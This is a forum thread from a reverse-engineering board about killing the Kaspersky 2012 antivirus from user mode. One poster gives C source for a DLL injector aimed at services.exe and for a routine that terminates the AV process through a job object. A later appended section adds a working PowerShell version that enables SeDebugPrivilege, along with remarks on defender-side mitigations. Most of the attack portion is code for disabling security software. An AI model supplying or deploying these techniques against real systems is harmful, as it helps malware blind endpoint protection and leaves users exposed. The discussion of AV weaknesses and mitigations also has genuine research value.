A forum for reverse engineering, OS internals and malware analysis 

Forum for discussion about user-mode development.
 #12278  by kmd
 Fri Mar 23, 2012 6:31 am
Tigzy wrote:I don't think so, it would already be done otherwise.
What was the point then, if nothing is available?
 #13915  by R00tKit
 Tue Jun 12, 2012 5:15 am
Hi,
In conjunction with this post: http://www.kernelmode.info/forum/viewto ... 85&start=0

I will show you how to kill Kaspersky 2012 from user mode.

It's simple and stupid:
Kaspersky allows injecting code into services.exe, and it also allows services.exe to open a handle with full access.
So what? :lol: Its developers forgot to hook AssignProcessToJobObject :o :o

I inject this code into services.exe :( (without any optimization)
Code:
#include <windows.h>

// Runs inside services.exe after injection: opens the target, puts it into a
// throwaway job object and terminates the job, which kills every process in it.
void Killkaspersky(int pid)
{
	OutputDebugStringW(L"inside kill\r\n");
	WCHAR f[100];
	// OpenProcess returns NULL on failure, not INVALID_HANDLE_VALUE
	HANDLE han = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
	if (han == NULL)
	{
		OutputDebugStringW(L"error open");
		return;
	}
	HANDLE jo = CreateJobObjectW(NULL, L"job");
	if (jo == NULL)
	{
		OutputDebugStringW(L"error job");
		CloseHandle(han);
		return;
	}
	// Attach as debugger to the same target (the posted code had a hard-coded PID here)
	if (!DebugActiveProcess(pid))
	{
		OutputDebugStringW(L"error debug");
		CloseHandle(jo);
		CloseHandle(han);
		return;
	}
	if (AssignProcessToJobObject(jo, han))
	{
		OutputDebugStringW(L"yes AssignProcessToJobObject");
		if (TerminateJobObject(jo, 0))
			OutputDebugStringW(L"yes TerminateJobObject");
		else
			OutputDebugStringW(L"error TerminateJobObject");
	}
	else
	{
		wsprintfW(f, L"Error %x\r\n", GetLastError());
		OutputDebugStringW(f);
	}
	CloseHandle(jo);
	CloseHandle(han);
}
Code:
#include <windows.h>
#include <strsafe.h>

// Classic LoadLibraryW injection: write the DLL path into the target and start a
// remote thread at LoadLibraryW with that path as its argument.
BOOL InjectDll(DWORD dwPID, LPCWSTR lpwDll)
{
	HANDLE hProcess;
	size_t dwDllLen = 0;
	LPVOID lpMem;
	SIZE_T dwWriteByte = 0;   // WriteProcessMemory takes a SIZE_T*, not a DWORD*
	LPVOID lpFunc;
	HANDLE hThread;
	BOOL bResult = FALSE;

	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID);
	if ( hProcess ){
		StringCchLengthW(lpwDll, MAX_PATH, &dwDllLen);
		if ( dwDllLen ){
			dwDllLen = (dwDllLen + 1) * sizeof(WCHAR);   // include the terminating NUL
			lpMem = VirtualAllocEx(hProcess, NULL, dwDllLen, MEM_COMMIT, PAGE_READWRITE);
			if ( lpMem ){
				if ( WriteProcessMemory(hProcess, lpMem, lpwDll, dwDllLen, &dwWriteByte) ){
					// kernel32 is mapped at the same base in every process, so the local address is valid remotely
					lpFunc = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW");
					if ( dwWriteByte && lpFunc ){
						// second parameter is LPSECURITY_ATTRIBUTES, so NULL rather than FALSE
						hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpFunc, lpMem, 0, NULL);
						if ( hThread )
						{
							WaitForSingleObject(hThread, INFINITE);
							CloseHandle(hThread);
							bResult = TRUE;
						}
					}
				}
				VirtualFreeEx(hProcess, lpMem, 0, MEM_RELEASE);   // LoadLibraryW has returned, the path is no longer needed
			}
		}
		CloseHandle(hProcess);   // the posted version leaked this handle on the success path
	}

	return bResult;
}
(more bugs after my school exam :lol:)
Have a good time
 #13930  by redp
 Tue Jun 12, 2012 2:00 pm
NtCl0$e wrote:Its developers forgot to hook AssignProcessToJobObject :o :o
McAfee (at least version 4.x) too (this is the list of spliced functions, not SSDT hooks) :lol:
 #13943  by iSecure
 Wed Jun 13, 2012 12:41 pm
NtCl0$e

On what systems have you tested your PoC?

I get access denied when I try OpenProcess() with PROCESS_ALL_ACCESS and the PID of the "services.exe" process (even on XP with admin privileges).
How is it supposed to inject into "services.exe" then? Please clarify this... Thanks
 #14012  by Mut4nt
 Fri Jun 15, 2012 11:37 pm
Nice. Well, Kaspersky has always been weak... I remember versions 8 and 9, they were very easy to remove from user mode :?
 #14471  by Tigzy
 Fri Jul 06, 2012 11:55 am
So basically, to sum up?

"Injector.exe" -> injects services.exe with "killer.dll"
"killer.dll" -> opens a full-rights handle on the Kaspersky process (UI?) -> assigns a dummy job to this process -> terminates the job (and consequently the process)
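The job-object primitive summarized above, exercised end to end as an added example (this is not code from the thread or from any of its posters). It runs from your own elevated process against a throwaway child you start yourself, rather than from inside services.exe against an AV process, and it enables SeDebugPrivilege first, which is the usual reason an administrator's OpenProcess(PROCESS_ALL_ACCESS) on a SYSTEM process such as services.exe comes back with access denied: administrators hold that privilege but it is disabled in the token until AdjustTokenPrivileges turns it on. The class name JobKill and the function names Enable-SeDebugPrivilege and Stop-ProcessViaJob are ours; the Win32 calls are the documented ones.

```powershell
# Added example: job-object kill of a process we own, with the SeDebugPrivilege step.
# JobKill, Enable-SeDebugPrivilege and Stop-ProcessViaJob are names chosen here.
# Run from an elevated PowerShell session.
$sig = @'
using System;
using System.Runtime.InteropServices;
public static class JobKill {
    [StructLayout(LayoutKind.Sequential)]
    public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)]
    public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }

    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess(uint access, bool inherit, uint pid);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern IntPtr CreateJobObject(IntPtr attrs, string name);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool AssignProcessToJobObject(IntPtr job, IntPtr process);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool TerminateJobObject(IntPtr job, uint exitCode);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool IsProcessInJob(IntPtr process, IntPtr job, out bool result);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool LookupPrivilegeValue(string system, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES newState, uint len, IntPtr prev, IntPtr retLen);
}
'@
Add-Type -TypeDefinition $sig

function Enable-SeDebugPrivilege {
    $TOKEN_ADJUST_PRIVILEGES = 0x20; $TOKEN_QUERY = 0x8; $SE_PRIVILEGE_ENABLED = 0x2
    $ERROR_NOT_ALL_ASSIGNED = 1300
    $tok = [IntPtr]::Zero
    if (-not [JobKill]::OpenProcessToken([JobKill]::GetCurrentProcess(), ($TOKEN_ADJUST_PRIVILEGES -bor $TOKEN_QUERY), [ref]$tok)) {
        throw "OpenProcessToken failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        $luid = New-Object 'JobKill+LUID'
        if (-not [JobKill]::LookupPrivilegeValue($null, 'SeDebugPrivilege', [ref]$luid)) { throw 'LookupPrivilegeValue failed' }
        $tp = New-Object 'JobKill+TOKEN_PRIVILEGES'
        $tp.PrivilegeCount = 1; $tp.Luid = $luid; $tp.Attributes = $SE_PRIVILEGE_ENABLED
        $ok  = [JobKill]::AdjustTokenPrivileges($tok, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        # AdjustTokenPrivileges returns TRUE even when the token does not hold the privilege;
        # ERROR_NOT_ALL_ASSIGNED is the real signal, and it is what a non-elevated shell gets.
        if (-not $ok -or $err -eq $ERROR_NOT_ALL_ASSIGNED) { throw "SeDebugPrivilege not available (error $err); run elevated" }
    } finally { [void][JobKill]::CloseHandle($tok) }
}

function Stop-ProcessViaJob([int]$ProcessId) {
    # AssignProcessToJobObject needs only PROCESS_SET_QUOTA | PROCESS_TERMINATE;
    # PROCESS_QUERY_INFORMATION is for IsProcessInJob. PROCESS_ALL_ACCESS, as in the PoC, is far more than required.
    $PROCESS_TERMINATE = 0x1; $PROCESS_SET_QUOTA = 0x100; $PROCESS_QUERY_INFORMATION = 0x400
    $h = [JobKill]::OpenProcess(($PROCESS_TERMINATE -bor $PROCESS_SET_QUOTA -bor $PROCESS_QUERY_INFORMATION), $false, [uint32]$ProcessId)
    if ($h -eq [IntPtr]::Zero) { throw "OpenProcess($ProcessId) failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    try {
        $inJob = $false
        [void][JobKill]::IsProcessInJob($h, [IntPtr]::Zero, [ref]$inJob)
        if ($inJob) {
            # Before Windows 8 a process belongs to at most one job, so the assignment below fails with
            # ERROR_ACCESS_DENIED (5). Windows 8+ nests the new (empty) job under the existing one and the kill still works.
            Write-Warning "PID $ProcessId is already in a job object"
        }
        $job = [JobKill]::CreateJobObject([IntPtr]::Zero, $null)   # anonymous job; a name is not needed
        if ($job -eq [IntPtr]::Zero) { throw 'CreateJobObject failed' }
        try {
            if (-not [JobKill]::AssignProcessToJobObject($job, $h)) {
                throw "AssignProcessToJobObject failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
            }
            if (-not [JobKill]::TerminateJobObject($job, 1)) { throw 'TerminateJobObject failed' }
        } finally { [void][JobKill]::CloseHandle($job) }
    } finally { [void][JobKill]::CloseHandle($h) }
}

# Demo against a process we own: a hidden child PowerShell that only sleeps.
Enable-SeDebugPrivilege
$victim = Start-Process powershell.exe -ArgumentList '-NoProfile','-Command','Start-Sleep 300' -PassThru -WindowStyle Hidden
Stop-ProcessViaJob -ProcessId $victim.Id
[void]$victim.WaitForExit(5000)
"PID $($victim.Id) exited: $($victim.HasExited)"
```

Two points worth keeping in mind when reading the thread against this. First, the primitive itself needs very little access on the target (PROCESS_SET_QUOTA and PROCESS_TERMINATE), so an AV that filters handle rights on its own processes but leaves those two bits, or that lets a trusted process such as services.exe open it fully, is exposed exactly as described. Second, the IsProcessInJob check is the defender-side caveat: on Windows 7 and earlier, a process that already lives in a job cannot be pulled into another one, so an AV that started its own processes inside a job would have made this particular kill fail; from Windows 8 onward nested jobs remove that accidental protection.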